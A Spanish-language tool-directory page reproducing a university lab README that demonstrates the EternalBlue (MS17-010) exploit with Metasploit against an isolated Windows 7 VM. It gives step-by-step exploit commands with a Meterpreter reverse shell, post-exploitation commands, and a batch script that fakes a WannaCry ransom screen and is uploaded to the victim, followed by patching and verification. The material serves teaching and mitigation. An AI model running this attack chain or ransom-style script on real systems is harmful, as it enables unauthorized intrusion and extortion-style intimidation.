Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
EternalBlue-Exploit-Demonstration-MS17-010 — Laboratorio de ciberseguridad que demuestra la explotación de CVE-2017-0144 (EternalBlue) usando Metasploit contra una máquina virtual vulnerable de Windows 7, logrando acceso a nivel SYSTEM a través de Meterpreter. Incluye cadena de ataque completa, post-explotación y mitigación mediante el parche MS17-010, probado en un entorno de laboratorio ético aislado. | Kitploit
Herramientas/GitHubGitHub/ichhyak22/eternalblue-exploit-demonstration-ms17-010
Escalada de PrivilegiosGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónAnálisis de MalwarePruebas de PenetraciónComando y ControlAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Respuesta a Incidentes
Labs y Práctica
GitHubichhyak22/eternalblue-exploit-demonstration-ms17-010

EternalBlue-Exploit-Demonstration-MS17-010

Ver Repositorio
hace 3 mesesAún no revisado

Acerca de

Laboratorio de ciberseguridad que demuestra la explotación de CVE-2017-0144 (EternalBlue) usando Metasploit contra una máquina virtual vulnerable de Windows 7, logrando acceso a nivel SYSTEM a través de Meterpreter. Incluye cadena de ataque completa, post-explotación y mitigación mediante el parche MS17-010, probado en un entorno de laboratorio ético aislado.

Compartir

Demostración del Exploit EternalBlue (MS17-010)

Laboratorio de ciberseguridad que demuestra la explotación de CVE-2017-0144 (EternalBlue) usando Metasploit contra un sistema Windows 7 vulnerable, obteniendo acceso a nivel SYSTEM a través de Meterpreter.

Este proyecto también simula un ataque de ransomware estilo WannaCry (DEMO SEGURA) y demuestra la mitigación usando el parche de seguridad MS17-010.


Información del Módulo

Módulo: CSCM828 Vulnerabilidades de Seguridad y Pruebas de Penetración

Estudiantes:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

Universidad: Swansea University


Recursos y Descargas

  1. Corrupción del Pool del Kernel de Windows Remoto SMB EternalBlue MS17-010
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Actualización de seguridad de Windows 7 x64)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Descarga de Máquinas Virtuales)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro
    https://www.vmware.com/products/desktop-hyper


1. Resumen

Este laboratorio demuestra:

  • Explotación remota de la vulnerabilidad SMB (MS17-010)
  • Acceso a nivel de kernel a través de EternalBlue
  • Establecimiento de sesión Meterpreter
  • Técnicas de post-explotación
  • Simulación de ransomware estilo WannaCry (segura)
  • Mitigación mediante parches

2. Entorno del Laboratorio

Requisitos

  • VMware Workstation / VirtualBox
  • Mínimo 8 GB de RAM

Máquina Atacante

  • Kali Linux
  • Metasploit Framework

Máquina Víctima

  • Windows 7 SP1 x64 (Sin parchear)

Red

  • Solo-anfitrión / NAT (entorno aislado)
  • Asegurar que ambas máquinas puedan comunicarse

⚠️ Este laboratorio debe realizarse en un entorno completamente aislado.


3. Configuración de la Víctima (Windows 7)

Ejecutar en el Símbolo del sistema como Administrador:

Deshabilitar Firewall

root@kitploit:~
netsh advfirewall set allprofiles state off

Verificar Puerto SMB

root@kitploit:~
netstat -an | findstr :445

Deshabilitar Actualizaciones (para estabilidad del laboratorio)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. Configuración del Atacante (Kali Linux)

Verificar Conectividad

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. Pasos de Explotación

Paso 1: Escanear Objetivo

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

Esperado:

  • El Host es VULNERABLE

Paso 2: Ejecutar Exploit

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Paso 3: Confirmar Acceso

root@kitploit:~
meterpreter > getuid

Esperado:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. Post-Explotación

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

Migración Estable

root@kitploit:~
ps
migrate <explorer.exe PID>

7. Simulación de WannaCry (DEMO SEGURA)

Crear Payload (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

Subir y Ejecutar

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. Mitigación (Demostración de Parche)

Paso 1: Descargar Parche

  • Visitar: https://www.catalog.update.microsoft.com/
  • Buscar: KB4012212 Windows 7 x64
  • Descargar el archivo .msu

Paso 2: Instalar Parche

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

Paso 3: Reiniciar

root@kitploit:~
shutdown /r /t 0

Paso 4: Verificar Parche

root@kitploit:~
systeminfo | findstr KB4012212

Paso 5: Re-ejecutar Exploit

Esperado:

  • El exploit falla
  • No hay sesión Meterpreter

Paso 6: Verificar con Nmap

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

Esperado:

  • NO VULNERABLE

9. Solución de Problemas

ProblemaSolución
El exploit fallaVerificar conectividad
Sin sesiónDeshabilitar firewall
La sesión muereReintentar exploit
Sin ventana visibleMigrar a explorer.exe

10. Consideraciones Éticas

Este proyecto se realiza:

  • Solo en máquinas de laboratorio controladas
  • En una red completamente aislada
  • Solo con fines educativos

El uso no autorizado viola:

  • Ley de Uso Indebido de Computadoras del Reino Unido de 1990

11. Conclusión

Este laboratorio demuestra:

  • Explotación real de SMB usando EternalBlue
  • Compromiso a nivel SYSTEM de Windows 7
  • Simulación de ataque de ransomware (segura)
  • Importancia de aplicar parches a tiempo
Descargar herramienta